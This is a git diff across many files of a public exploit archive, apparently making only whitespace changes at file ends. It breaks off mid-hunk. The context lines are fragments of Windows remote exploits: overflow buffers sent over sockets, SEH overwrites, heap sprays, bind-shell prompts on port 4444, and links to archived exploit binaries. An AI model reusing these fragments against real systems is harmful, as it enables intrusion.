a/platforms/windows/remote/42155.py b/platforms/windows/remote/42155.py index fc6fd68b5..5c0a7dbc2 100755 --- a/platforms/windows/remote/42155.py +++ b/platforms/windows/remote/42155.py @@ -103,4 +103,4 @@ socket.send(buffer) data = socket.recv(4096) print data -socket.close() +socket.close() \ No newline at end of file diff --git a/platforms/windows/remote/42159.txt b/platforms/windows/remote/42159.txt index c8f44e11f..e0f57268b 100755 --- a/platforms/windows/remote/42159.txt +++ b/platforms/windows/remote/42159.txt @@ -64,5 +64,4 @@ Diffrent Drives or folder. | || |_| | |_| | _ || || |_| | |_| \___/ \___/|_| |_|___|____/ -Touhid Shaikh....... - +Touhid Shaikh....... \ No newline at end of file diff --git a/platforms/windows/remote/42165.py b/platforms/windows/remote/42165.py index fc3680ee1..3162f56c6 100755 --- a/platforms/windows/remote/42165.py +++ b/platforms/windows/remote/42165.py @@ -81,4 +81,4 @@ __ __| _ \ | | | |_ _| __ \ _| \___/ \___/ _| _|___|____/ Touhid M.Shaikh -""" +""" \ No newline at end of file diff --git a/platforms/windows/remote/4217.html b/platforms/windows/remote/4217.html index 0d55f7fa0..1a91ecde2 100755 --- a/platforms/windows/remote/4217.html +++ b/platforms/windows/remote/4217.html @@ -34,4 +34,4 @@ -# milw0rm.com [2007-07-24] +# milw0rm.com [2007-07-24] \ No newline at end of file diff --git a/platforms/windows/remote/42186.py b/platforms/windows/remote/42186.py index e12f21a5c..e1124c8ae 100755 --- a/platforms/windows/remote/42186.py +++ b/platforms/windows/remote/42186.py @@ -165,4 +165,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password") -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4222.c b/platforms/windows/remote/4222.c index 2b4db48bb..f8fd4247d 100755 --- a/platforms/windows/remote/4222.c +++ b/platforms/windows/remote/4222.c @@ -187,4 +187,4 @@ do_shell (int sockfd) } } -// milw0rm.com [2007-07-24] +// milw0rm.com [2007-07-24] \ No newline at end of file diff --git a/platforms/windows/remote/42222.py b/platforms/windows/remote/42222.py index 5ab233cef..dfb5630fc 100755 --- a/platforms/windows/remote/42222.py +++ b/platforms/windows/remote/42222.py @@ -94,4 +94,4 @@ exploit = junk1 + nSEH + SEH + junk2 + llamaleftovers + junk3 + buf + junk4 httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) httpsocket.connect((host,port)) httpsocket.send("GET " + exploit + " HTTP/1.0\r\n\r\n") -httpsocket.close() +httpsocket.close() \ No newline at end of file diff --git a/platforms/windows/remote/4223.pl b/platforms/windows/remote/4223.pl index b43fa728f..d7ee089c8 100755 --- a/platforms/windows/remote/4223.pl +++ b/platforms/windows/remote/4223.pl @@ -148,4 +148,4 @@ print $sock "2 SEARCH ON <$payload>\r\n"; $sock->close(); -# milw0rm.com [2007-07-25] +# milw0rm.com [2007-07-25] \ No newline at end of file diff --git a/platforms/windows/remote/4226.html b/platforms/windows/remote/4226.html index 9b661b5b0..f5b6adf5d 100755 --- a/platforms/windows/remote/4226.html +++ b/platforms/windows/remote/4226.html @@ -37,4 +37,4 @@ End Sub -# milw0rm.com [2007-07-25] +# milw0rm.com [2007-07-25] \ No newline at end of file diff --git a/platforms/windows/remote/4228.pl b/platforms/windows/remote/4228.pl index 13fe463cd..82013419e 100755 --- a/platforms/windows/remote/4228.pl +++ b/platforms/windows/remote/4228.pl @@ -144,4 +144,4 @@ print <$sock>; $sock->close(); -# milw0rm.com [2007-07-26] +# milw0rm.com [2007-07-26] \ No newline at end of file diff --git a/platforms/windows/remote/4230.html b/platforms/windows/remote/4230.html index 29dea99e9..dd53395cb 100755 --- a/platforms/windows/remote/4230.html +++ b/platforms/windows/remote/4230.html @@ -14,4 +14,4 @@ alert("done"); -# milw0rm.com [2007-07-26] +# milw0rm.com [2007-07-26] \ No newline at end of file diff --git a/platforms/windows/remote/42304.py b/platforms/windows/remote/42304.py index d824a05e6..9b3e42a02 100755 --- a/platforms/windows/remote/42304.py +++ b/platforms/windows/remote/42304.py @@ -147,5 +147,4 @@ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host, port)) s.send(request + "\r\n\r\n") -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/42327.html b/platforms/windows/remote/42327.html index dc884afff..62d82e19c 100755 --- a/platforms/windows/remote/42327.html +++ b/platforms/windows/remote/42327.html @@ -372,4 +372,4 @@ window.onload = trigger; setInterval("window.location.reload()", 3000) /* <----- */ - + \ No newline at end of file diff --git a/platforms/windows/remote/42328.py b/platforms/windows/remote/42328.py index f5972b4ab..7febcf2bd 100755 --- a/platforms/windows/remote/42328.py +++ b/platforms/windows/remote/42328.py @@ -96,6 +96,4 @@ print "Sending EViL 331 response" connect.send("331 "+sploit+"\r\n") print "Here, have a handy dandy command shell!" connect.close() -sock.close() - - +sock.close() \ No newline at end of file diff --git a/platforms/windows/remote/4234.html b/platforms/windows/remote/4234.html index 1070606ec..8cfbe2c5d 100755 --- a/platforms/windows/remote/4234.html +++ b/platforms/windows/remote/4234.html @@ -140,4 +140,4 @@ Concept"> -# milw0rm.com [2007-07-27] +# milw0rm.com [2007-07-27] \ No newline at end of file diff --git a/platforms/windows/remote/4237.html b/platforms/windows/remote/4237.html index 258513a98..0d4e18ceb 100755 --- a/platforms/windows/remote/4237.html +++ b/platforms/windows/remote/4237.html @@ -14,4 +14,4 @@ obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/ -# milw0rm.com [2007-07-27] +# milw0rm.com [2007-07-27] \ No newline at end of file diff --git a/platforms/windows/remote/42395.py b/platforms/windows/remote/42395.py index c008579be..6b58b5ed1 100755 --- a/platforms/windows/remote/42395.py +++ b/platforms/windows/remote/42395.py @@ -114,4 +114,4 @@ packet += "\r\n" print "[*] Get nt authority or die hard" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4240.html b/platforms/windows/remote/4240.html index bee9cfacf..a1a3e42df 100755 --- a/platforms/windows/remote/4240.html +++ b/platforms/windows/remote/4240.html @@ -81,4 +81,4 @@ Concept"> -# milw0rm.com [2007-07-28] +# milw0rm.com [2007-07-28] \ No newline at end of file diff --git a/platforms/windows/remote/4244.html b/platforms/windows/remote/4244.html index c648fcff6..65a5c1c9f 100755 --- a/platforms/windows/remote/4244.html +++ b/platforms/windows/remote/4244.html @@ -75,4 +75,4 @@ function Poc() { -# milw0rm.com [2007-07-29] +# milw0rm.com [2007-07-29] \ No newline at end of file diff --git a/platforms/windows/remote/4245.html b/platforms/windows/remote/4245.html index 9f7bdbf80..b835f8c9f 100755 --- a/platforms/windows/remote/4245.html +++ b/platforms/windows/remote/4245.html @@ -71,4 +71,4 @@ _9090909090.CreateProcess(ba, ad, fO, Od) -# milw0rm.com [2007-07-30] +# milw0rm.com [2007-07-30] \ No newline at end of file diff --git a/platforms/windows/remote/4247.c b/platforms/windows/remote/4247.c index 109772ea8..325653569 100755 --- a/platforms/windows/remote/4247.c +++ b/platforms/windows/remote/4247.c @@ -340,4 +340,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2007-07-30] +// milw0rm.com [2007-07-30] \ No newline at end of file diff --git a/platforms/windows/remote/42484.html b/platforms/windows/remote/42484.html index a4d8177bc..2b6d39c61 100755 --- a/platforms/windows/remote/42484.html +++ b/platforms/windows/remote/42484.html @@ -1221,4 +1221,4 @@ window.onload = function() { }; - + \ No newline at end of file diff --git a/platforms/windows/remote/4250.html b/platforms/windows/remote/4250.html index 4e0e5824b..2514b119a 100755 --- a/platforms/windows/remote/4250.html +++ b/platforms/windows/remote/4250.html @@ -47,4 +47,4 @@ target.GetComponentVersion(buffer); -# milw0rm.com [2007-07-31] +# milw0rm.com [2007-07-31] \ No newline at end of file diff --git a/platforms/windows/remote/4255.html b/platforms/windows/remote/4255.html index fc856316d..1522d4fbd 100755 --- a/platforms/windows/remote/4255.html +++ b/platforms/windows/remote/4255.html @@ -45,4 +45,4 @@ -# milw0rm.com [2007-08-05] +# milw0rm.com [2007-08-05] \ No newline at end of file diff --git a/platforms/windows/remote/4259.txt b/platforms/windows/remote/4259.txt index 3f9beafd4..19b86dd10 100755 --- a/platforms/windows/remote/4259.txt +++ b/platforms/windows/remote/4259.txt @@ -50,4 +50,4 @@ This exploit was written for working on Windows XP Professional SP2 -# milw0rm.com [2007-08-06] +# milw0rm.com [2007-08-06] \ No newline at end of file diff --git a/platforms/windows/remote/426.c b/platforms/windows/remote/426.c index 0de419328..5e42c223d 100755 --- a/platforms/windows/remote/426.c +++ b/platforms/windows/remote/426.c @@ -242,4 +242,4 @@ void loginftp(SOCKET sockfd, char *user, char *pass) } -// milw0rm.com [2004-08-31] +// milw0rm.com [2004-08-31] \ No newline at end of file diff --git a/platforms/windows/remote/4279.html b/platforms/windows/remote/4279.html index f9a97b02c..1c9c4a0f3 100755 --- a/platforms/windows/remote/4279.html +++ b/platforms/windows/remote/4279.html @@ -50,4 +50,4 @@ location.reload(); -# milw0rm.com [2007-08-10] +# milw0rm.com [2007-08-10] \ No newline at end of file diff --git a/platforms/windows/remote/4280.pl b/platforms/windows/remote/4280.pl index fed2b2c08..0222d96d9 100755 --- a/platforms/windows/remote/4280.pl +++ b/platforms/windows/remote/4280.pl @@ -82,4 +82,4 @@ system("telnet $host 4444"); exit; -# milw0rm.com [2007-08-12] +# milw0rm.com [2007-08-12] \ No newline at end of file diff --git a/platforms/windows/remote/4283.pl b/platforms/windows/remote/4283.pl index 80de4d4c5..bc5c7df4a 100755 --- a/platforms/windows/remote/4283.pl +++ b/platforms/windows/remote/4283.pl @@ -143,4 +143,4 @@ close($socket); # C:\Documents and Settings\****\Desktop\racer053b5> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -# milw0rm.com [2007-08-13] +# milw0rm.com [2007-08-13] \ No newline at end of file diff --git a/platforms/windows/remote/4287.py b/platforms/windows/remote/4287.py index 8ffc665d5..e0efe6188 100755 --- a/platforms/windows/remote/4287.py +++ b/platforms/windows/remote/4287.py @@ -110,4 +110,4 @@ if __name__ == '__main__': sys.exit(-1) Fascism(target,u,p) -# milw0rm.com [2007-08-14] +# milw0rm.com [2007-08-14] \ No newline at end of file diff --git a/platforms/windows/remote/4290.html b/platforms/windows/remote/4290.html index 549d661b5..dbea29cf5 100755 --- a/platforms/windows/remote/4290.html +++ b/platforms/windows/remote/4290.html @@ -35,4 +35,4 @@ -# milw0rm.com [2007-08-16] +# milw0rm.com [2007-08-16] \ No newline at end of file diff --git a/platforms/windows/remote/4292.cpp b/platforms/windows/remote/4292.cpp index ceb6d7f40..b6154cd29 100755 --- a/platforms/windows/remote/4292.cpp +++ b/platforms/windows/remote/4292.cpp @@ -508,4 +508,4 @@ int main(int argc, char** argv) return 0; } -// milw0rm.com [2007-08-17] +// milw0rm.com [2007-08-17] \ No newline at end of file diff --git a/platforms/windows/remote/4299.html b/platforms/windows/remote/4299.html index f88ce6ef4..329e67346 100755 --- a/platforms/windows/remote/4299.html +++ b/platforms/windows/remote/4299.html @@ -62,4 +62,4 @@ IUAComFormX.ReInit UserName ,Password ,ProxyServerIP ,ProxyIP ,Project ,PortNo -# milw0rm.com [2007-08-21] +# milw0rm.com [2007-08-21] \ No newline at end of file diff --git a/platforms/windows/remote/4301.cpp b/platforms/windows/remote/4301.cpp index 290c26aff..4558546dc 100755 --- a/platforms/windows/remote/4301.cpp +++ b/platforms/windows/remote/4301.cpp @@ -337,4 +337,4 @@ void main(int argc, char* argv[]) } } -// milw0rm.com [2007-08-22] +// milw0rm.com [2007-08-22] \ No newline at end of file diff --git a/platforms/windows/remote/431.c b/platforms/windows/remote/431.c index 53bd2f61c..c5e80057d 100755 --- a/platforms/windows/remote/431.c +++ b/platforms/windows/remote/431.c @@ -391,4 +391,4 @@ unsigned char xor_data(unsigned char byte) return(byte ^ 0x92); } -// milw0rm.com [2004-09-02] +// milw0rm.com [2004-09-02] \ No newline at end of file diff --git a/platforms/windows/remote/4316.cpp b/platforms/windows/remote/4316.cpp index 6a8163517..567c1726f 100755 --- a/platforms/windows/remote/4316.cpp +++ b/platforms/windows/remote/4316.cpp @@ -584,4 +584,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2007-08-26] +// milw0rm.com [2007-08-26] \ No newline at end of file diff --git a/platforms/windows/remote/4322.html b/platforms/windows/remote/4322.html index 8c60620b6..cba4c0a44 100755 --- a/platforms/windows/remote/4322.html +++ b/platforms/windows/remote/4322.html @@ -84,4 +84,4 @@ } -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/windows/remote/4323.html b/platforms/windows/remote/4323.html index 6a94f6b11..b0c9a3aaf 100755 --- a/platforms/windows/remote/4323.html +++ b/platforms/windows/remote/4323.html @@ -39,4 +39,4 @@ End Sub -# milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/windows/remote/4324.html b/platforms/windows/remote/4324.html index 537b774e8..258e9ff2b 100755 --- a/platforms/windows/remote/4324.html +++ b/platforms/windows/remote/4324.html @@ -32,4 +32,4 @@ End Sub -# milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/windows/remote/4328.html b/platforms/windows/remote/4328.html index 853601645..59acd1f29 100755 --- a/platforms/windows/remote/4328.html +++ b/platforms/windows/remote/4328.html @@ -99,4 +99,4 @@ EasyMailSMTPObj.SubmitToExpress bof -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/windows/remote/4334.txt b/platforms/windows/remote/4334.txt index acb3b0ec3..5ef84076b 100755 --- a/platforms/windows/remote/4334.txt +++ b/platforms/windows/remote/4334.txt @@ -9,4 +9,4 @@ thanks ole andre again, His ospy is perfect. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4334.rar (08292007-exp_msn.rar) -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/windows/remote/4348.c b/platforms/windows/remote/4348.c index 491459175..800755db3 100755 --- a/platforms/windows/remote/4348.c +++ b/platforms/windows/remote/4348.c @@ -73,4 +73,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-08-31] +// milw0rm.com [2007-08-31] \ No newline at end of file diff --git a/platforms/windows/remote/435.c b/platforms/windows/remote/435.c index 008d881ac..ca6ff85db 100755 --- a/platforms/windows/remote/435.c +++ b/platforms/windows/remote/435.c @@ -111,4 +111,4 @@ int main(int argc,char **argv){ return 0; } -// milw0rm.com [2004-09-08] +// milw0rm.com [2004-09-08] \ No newline at end of file diff --git a/platforms/windows/remote/4351.html b/platforms/windows/remote/4351.html index 3448f0903..3b978474e 100755 --- a/platforms/windows/remote/4351.html +++ b/platforms/windows/remote/4351.html @@ -46,4 +46,4 @@ coder : minhbq -# milw0rm.com [2007-09-01] +# milw0rm.com [2007-09-01] \ No newline at end of file diff --git a/platforms/windows/remote/4357.html b/platforms/windows/remote/4357.html index d9c250520..84243bf13 100755 --- a/platforms/windows/remote/4357.html +++ b/platforms/windows/remote/4357.html @@ -31,4 +31,4 @@ HPRevolutionRegistryManager.WriteRegistry group ,section ,key ,valType ,value 'd -# milw0rm.com [2007-09-03] +# milw0rm.com [2007-09-03] \ No newline at end of file diff --git a/platforms/windows/remote/4360.rb b/platforms/windows/remote/4360.rb index 13deb72e4..4a2ca452f 100755 --- a/platforms/windows/remote/4360.rb +++ b/platforms/windows/remote/4360.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/4366.html b/platforms/windows/remote/4366.html index e27629aa7..39de97257 100755 --- a/platforms/windows/remote/4366.html +++ b/platforms/windows/remote/4366.html @@ -49,4 +49,4 @@ gl.SetInfo("", "", "", 1, 1, 1, "", s); -# milw0rm.com [2007-09-05] +# milw0rm.com [2007-09-05] \ No newline at end of file diff --git a/platforms/windows/remote/4367.c b/platforms/windows/remote/4367.c index 64a8284c4..a1abc6b1c 100755 --- a/platforms/windows/remote/4367.c +++ b/platforms/windows/remote/4367.c @@ -160,4 +160,4 @@ int main( int argc, char **argv ) { return 0; } -// milw0rm.com [2007-09-06] +// milw0rm.com [2007-09-06] \ No newline at end of file diff --git a/platforms/windows/remote/4372.html b/platforms/windows/remote/4372.html index 892aa3408..0983eb02c 100755 --- a/platforms/windows/remote/4372.html +++ b/platforms/windows/remote/4372.html @@ -34,4 +34,4 @@ s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\x0c\x0c\x0c\x0c" target.SetClientInfo(1, s, 1) -# milw0rm.com [2007-09-07] +# milw0rm.com [2007-09-07] \ No newline at end of file diff --git a/platforms/windows/remote/4388.html b/platforms/windows/remote/4388.html index 0583e4239..0d8a5070f 100755 --- a/platforms/windows/remote/4388.html +++ b/platforms/windows/remote/4388.html @@ -34,4 +34,4 @@ -# milw0rm.com [2007-09-10] +# milw0rm.com [2007-09-10] \ No newline at end of file diff --git a/platforms/windows/remote/4389.html b/platforms/windows/remote/4389.html index 07cbf7002..25132ddd5 100755 --- a/platforms/windows/remote/4389.html +++ b/platforms/windows/remote/4389.html @@ -78,4 +78,4 @@ -# milw0rm.com [2007-09-10] +# milw0rm.com [2007-09-10] \ No newline at end of file diff --git a/platforms/windows/remote/439.c b/platforms/windows/remote/439.c index b93f7d22d..6a3601f8f 100755 --- a/platforms/windows/remote/439.c +++ b/platforms/windows/remote/439.c @@ -243,4 +243,4 @@ return 0; } -// milw0rm.com [2004-09-12] +// milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/windows/remote/4393.html b/platforms/windows/remote/4393.html index c38e5c060..5edfa84b3 100755 --- a/platforms/windows/remote/4393.html +++ b/platforms/windows/remote/4393.html @@ -42,4 +42,4 @@ -# milw0rm.com [2007-09-11] +# milw0rm.com [2007-09-11] \ No newline at end of file diff --git a/platforms/windows/remote/4394.html b/platforms/windows/remote/4394.html index bb3bec2d9..548b4a23f 100755 --- a/platforms/windows/remote/4394.html +++ b/platforms/windows/remote/4394.html @@ -34,4 +34,4 @@ -# milw0rm.com [2007-09-11] +# milw0rm.com [2007-09-11] \ No newline at end of file diff --git a/platforms/windows/remote/4398.html b/platforms/windows/remote/4398.html index c40c532aa..18a7b3bb4 100755 --- a/platforms/windows/remote/4398.html +++ b/platforms/windows/remote/4398.html @@ -50,4 +50,4 @@ SQLServer.Start StartMode ,Server ,Login ,Password -# milw0rm.com [2007-09-12] +# milw0rm.com [2007-09-12] \ No newline at end of file diff --git a/platforms/windows/remote/4420.html b/platforms/windows/remote/4420.html index 86ba1f28b..16cc893d1 100755 --- a/platforms/windows/remote/4420.html +++ b/platforms/windows/remote/4420.html @@ -53,4 +53,4 @@ -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/windows/remote/4424.html b/platforms/windows/remote/4424.html index 684904ef7..7d4ed0f9c 100755 --- a/platforms/windows/remote/4424.html +++ b/platforms/windows/remote/4424.html @@ -23,4 +23,4 @@ The following is the QuickTime .qtl version of the "shutting down skype" PoC: -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/windows/remote/4427.html b/platforms/windows/remote/4427.html index a6b014d77..a9bc1df79 100755 --- a/platforms/windows/remote/4427.html +++ b/platforms/windows/remote/4427.html @@ -26,4 +26,4 @@ obj[target](url, dst, title, artist, album, genere, size, param1, param2); -# milw0rm.com [2007-09-19] +# milw0rm.com [2007-09-19] \ No newline at end of file diff --git a/platforms/windows/remote/4428.html b/platforms/windows/remote/4428.html index 8e7fdf83c..b99870acc 100755 --- a/platforms/windows/remote/4428.html +++ b/platforms/windows/remote/4428.html @@ -41,4 +41,4 @@ -# milw0rm.com [2007-09-19] +# milw0rm.com [2007-09-19] \ No newline at end of file diff --git a/platforms/windows/remote/4429.pl b/platforms/windows/remote/4429.pl index 3ad4c11b1..7c731e174 100755 --- a/platforms/windows/remote/4429.pl +++ b/platforms/windows/remote/4429.pl @@ -129,4 +129,4 @@ sub imap_recv } } -# milw0rm.com [2007-09-19] +# milw0rm.com [2007-09-19] \ No newline at end of file diff --git a/platforms/windows/remote/4438.cpp b/platforms/windows/remote/4438.cpp index 66fee715e..69179ffd6 100755 --- a/platforms/windows/remote/4438.cpp +++ b/platforms/windows/remote/4438.cpp @@ -1186,4 +1186,4 @@ int main(int argc, char *argv[]) } -// milw0rm.com [2007-09-21] +// milw0rm.com [2007-09-21] \ No newline at end of file diff --git a/platforms/windows/remote/4445.html b/platforms/windows/remote/4445.html index 2c3c3142e..4055cc7be 100755 --- a/platforms/windows/remote/4445.html +++ b/platforms/windows/remote/4445.html @@ -43,4 +43,4 @@ window.close 'no crash - just hangup - ie needs to be closed manually in some wa -# milw0rm.com [2007-09-23] +# milw0rm.com [2007-09-23] \ No newline at end of file diff --git a/platforms/windows/remote/4450.py b/platforms/windows/remote/4450.py index 45a74e901..f6ca03a98 100755 --- a/platforms/windows/remote/4450.py +++ b/platforms/windows/remote/4450.py @@ -61,4 +61,4 @@ print "DONE" # EoF -# milw0rm.com [2007-09-24] +# milw0rm.com [2007-09-24] \ No newline at end of file diff --git a/platforms/windows/remote/4452.html b/platforms/windows/remote/4452.html index ee4f6edb6..9344f5cdd 100755 --- a/platforms/windows/remote/4452.html +++ b/platforms/windows/remote/4452.html @@ -76,4 +76,4 @@ function getSpraySlide(spraySlide, spraySlideSize) -# milw0rm.com [2007-09-24] +# milw0rm.com [2007-09-24] \ No newline at end of file diff --git a/platforms/windows/remote/4453.html b/platforms/windows/remote/4453.html index a11521939..8a91d1ec8 100755 --- a/platforms/windows/remote/4453.html +++ b/platforms/windows/remote/4453.html @@ -52,4 +52,4 @@ -# milw0rm.com [2007-09-24] +# milw0rm.com [2007-09-24] \ No newline at end of file diff --git a/platforms/windows/remote/4455.pl b/platforms/windows/remote/4455.pl index 16b5c8b92..737f8a6df 100755 --- a/platforms/windows/remote/4455.pl +++ b/platforms/windows/remote/4455.pl @@ -123,4 +123,4 @@ return $_; # milw0rm.com [2007-09-25] -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/windows/remote/4468.html b/platforms/windows/remote/4468.html index 01af430ee..59b91d670 100755 --- a/platforms/windows/remote/4468.html +++ b/platforms/windows/remote/4468.html @@ -50,4 +50,4 @@ window.onload = function() -# milw0rm.com [2007-09-29] +# milw0rm.com [2007-09-29] \ No newline at end of file diff --git a/platforms/windows/remote/4484.pl b/platforms/windows/remote/4484.pl index 53ac52bc2..27d1acb45 100755 --- a/platforms/windows/remote/4484.pl +++ b/platforms/windows/remote/4484.pl @@ -66,4 +66,4 @@ close($sock); print "done.\n"; -# milw0rm.com [2007-10-04] +# milw0rm.com [2007-10-04] \ No newline at end of file diff --git a/platforms/windows/remote/4487.html b/platforms/windows/remote/4487.html index b99738c34..26cea91c7 100755 --- a/platforms/windows/remote/4487.html +++ b/platforms/windows/remote/4487.html @@ -31,4 +31,4 @@ -# milw0rm.com [2007-10-05] +# milw0rm.com [2007-10-05] \ No newline at end of file diff --git a/platforms/windows/remote/4488.html b/platforms/windows/remote/4488.html index 6a821bc73..bb1f19528 100755 --- a/platforms/windows/remote/4488.html +++ b/platforms/windows/remote/4488.html @@ -34,4 +34,4 @@ -# milw0rm.com [2007-10-05] +# milw0rm.com [2007-10-05] \ No newline at end of file diff --git a/platforms/windows/remote/45.c b/platforms/windows/remote/45.c index e81d2e6c2..08456342b 100755 --- a/platforms/windows/remote/45.c +++ b/platforms/windows/remote/45.c @@ -258,4 +258,4 @@ return 0; } -// milw0rm.com [2003-06-23] +// milw0rm.com [2003-06-23] \ No newline at end of file diff --git a/platforms/windows/remote/4506.html b/platforms/windows/remote/4506.html index bab204a40..37eb37720 100755 --- a/platforms/windows/remote/4506.html +++ b/platforms/windows/remote/4506.html @@ -40,4 +40,4 @@ -# milw0rm.com [2007-10-09] +# milw0rm.com [2007-10-09] \ No newline at end of file diff --git a/platforms/windows/remote/4526.html b/platforms/windows/remote/4526.html index f806e3331..9e69de47b 100755 --- a/platforms/windows/remote/4526.html +++ b/platforms/windows/remote/4526.html @@ -17,4 +17,4 @@ id="kat"> be overwriten.") -# milw0rm.com [2007-10-12] +# milw0rm.com [2007-10-12] \ No newline at end of file diff --git a/platforms/windows/remote/4566.rb b/platforms/windows/remote/4566.rb index a85e92116..bb6a36b45 100755 --- a/platforms/windows/remote/4566.rb +++ b/platforms/windows/remote/4566.rb @@ -81,4 +81,4 @@ class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote end end -# milw0rm.com [2007-10-24] +# milw0rm.com [2007-10-24] \ No newline at end of file diff --git a/platforms/windows/remote/4573.py b/platforms/windows/remote/4573.py index 707ba1a46..a5b5d29f7 100755 --- a/platforms/windows/remote/4573.py +++ b/platforms/windows/remote/4573.py @@ -97,4 +97,4 @@ expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n') expl.close() print "[*] Check port 4444 for bindshell" -# milw0rm.com [2007-10-27] +# milw0rm.com [2007-10-27] \ No newline at end of file diff --git a/platforms/windows/remote/4574.pl b/platforms/windows/remote/4574.pl index 2f0518661..9165b9100 100755 --- a/platforms/windows/remote/4574.pl +++ b/platforms/windows/remote/4574.pl @@ -184,4 +184,4 @@ close( $sock ); print "[+] Done. Now check for a bind shell on $ip:4444!\n"; -# milw0rm.com [2007-10-27] +# milw0rm.com [2007-10-27] \ No newline at end of file diff --git a/platforms/windows/remote/4579.html b/platforms/windows/remote/4579.html index 2d6f839a4..0d248c5cb 100755 --- a/platforms/windows/remote/4579.html +++ b/platforms/windows/remote/4579.html @@ -66,4 +66,4 @@ GomManager.OpenURL sURL -# milw0rm.com [2007-10-29] +# milw0rm.com [2007-10-29] \ No newline at end of file diff --git a/platforms/windows/remote/4594.html b/platforms/windows/remote/4594.html index 5472b43df..99819cada 100755 --- a/platforms/windows/remote/4594.html +++ b/platforms/windows/remote/4594.html @@ -41,4 +41,4 @@ nelx.AddRouteEntry("", buf); -# milw0rm.com [2007-11-01] +# milw0rm.com [2007-11-01] \ No newline at end of file diff --git a/platforms/windows/remote/4598.html b/platforms/windows/remote/4598.html index 53be29945..174f5188d 100755 --- a/platforms/windows/remote/4598.html +++ b/platforms/windows/remote/4598.html @@ -28,4 +28,4 @@ -# milw0rm.com [2007-11-02] +# milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/windows/remote/4616.pl b/platforms/windows/remote/4616.pl index 066363f04..10dd91f6c 100755 --- a/platforms/windows/remote/4616.pl +++ b/platforms/windows/remote/4616.pl @@ -1479,4 +1479,4 @@ HTML close(FILE); -# milw0rm.com [2007-11-11] +# milw0rm.com [2007-11-11] \ No newline at end of file diff --git a/platforms/windows/remote/4651.cpp b/platforms/windows/remote/4651.cpp index 61fb06cf7..0eaf3d96f 100755 --- a/platforms/windows/remote/4651.cpp +++ b/platforms/windows/remote/4651.cpp @@ -262,4 +262,4 @@ int info() return 0; } -// milw0rm.com [2007-11-24] +// milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/windows/remote/4657.py b/platforms/windows/remote/4657.py index 722c38ce3..b71295fc0 100755 --- a/platforms/windows/remote/4657.py +++ b/platforms/windows/remote/4657.py @@ -122,4 +122,4 @@ raw_input("[+] Done, press enter to quit") c.close() s.close() -# milw0rm.com [2007-11-26] +# milw0rm.com [2007-11-26] \ No newline at end of file diff --git a/platforms/windows/remote/4663.html b/platforms/windows/remote/4663.html index e6e6cb1f0..b287c0735 100755 --- a/platforms/windows/remote/4663.html +++ b/platforms/windows/remote/4663.html @@ -93,4 +93,4 @@ BD.initx(SiteAuthority); -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/windows/remote/4664.txt b/platforms/windows/remote/4664.txt index be6f17e37..9cb90077a 100755 --- a/platforms/windows/remote/4664.txt +++ b/platforms/windows/remote/4664.txt @@ -39,4 +39,4 @@ Fuckz 2: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4664.tar.gz (11272007-qt_public.tar.gz) -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/windows/remote/4699.txt b/platforms/windows/remote/4699.txt index f9c965078..fa2ebe9a8 100755 --- a/platforms/windows/remote/4699.txt +++ b/platforms/windows/remote/4699.txt @@ -134,4 +134,4 @@ The bugs will be fixed in the next versions. Luigi Auriemma http://aluigi.org -# milw0rm.com [2007-12-07] +# milw0rm.com [2007-12-07] \ No newline at end of file diff --git a/platforms/windows/remote/4700.txt b/platforms/windows/remote/4700.txt index d6ef7420f..4d77b3d25 100755 --- a/platforms/windows/remote/4700.txt +++ b/platforms/windows/remote/4700.txt @@ -102,4 +102,4 @@ is no reply yet: Luigi Auriemma http://aluigi.org -# milw0rm.com [2007-12-07] +# milw0rm.com [2007-12-07] \ No newline at end of file diff --git a/platforms/windows/remote/4713.txt b/platforms/windows/remote/4713.txt index 552eaf3db..5781a562d 100755 --- a/platforms/windows/remote/4713.txt +++ b/platforms/windows/remote/4713.txt @@ -153,4 +153,4 @@ Version 3.8 ####################################################################### -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/windows/remote/4715.txt b/platforms/windows/remote/4715.txt index 